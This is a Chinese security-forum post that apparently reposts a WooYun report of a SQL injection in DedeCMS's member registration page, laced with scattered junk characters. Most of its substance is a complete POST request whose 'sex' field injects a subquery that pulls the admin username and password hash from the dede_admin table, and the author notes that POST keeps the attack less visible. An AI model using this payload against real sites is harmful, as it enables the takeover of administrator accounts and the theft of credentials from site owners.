找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2217|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞$ R, }& ?" f' Y% I- z
简要描述:
' m8 ~3 j" R4 o: |
1 t& q' D/ w/ G需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
% j" e4 P' `8 {/ E原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.3 A3 `9 ?! p% }( w6 B
详细说明:跟这个漏洞
& c% m) R, C, ]* U# a * t- ]1 V7 ?0 @1 w' h1 z4 a1 J
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
$ ]- I) f% z$ J6 h. F* O是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
" w5 |* N0 i( `' t4 ^POST提交以下数据,其实不用POST提交的,这样隐蔽点.
$ Y3 l7 W+ ?6 J) p$ T8 \
& }/ M) L# o( w, }7 T* [% Y& bwww.political-security.com/member/reg_new.php
& O& @9 O4 g+ d$ h5 i
3 s& w' y5 v# K3 L5 {9 APOST* b" ^  {7 H+ t

1 D% G; }4 v/ g: [dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
0 ?+ g, j7 V  E* R, c9 O' @userid=c4rp3nt3r&uname=c4rp3nt3r$ ^3 N3 U" j9 r+ f/ W4 Q
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
" g) z$ K( K$ S! G6 ]# V&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
+ a4 |: w9 o$ f2 N7 p1 V1 }, Y(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');( V- T9 X" Z2 b# v
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表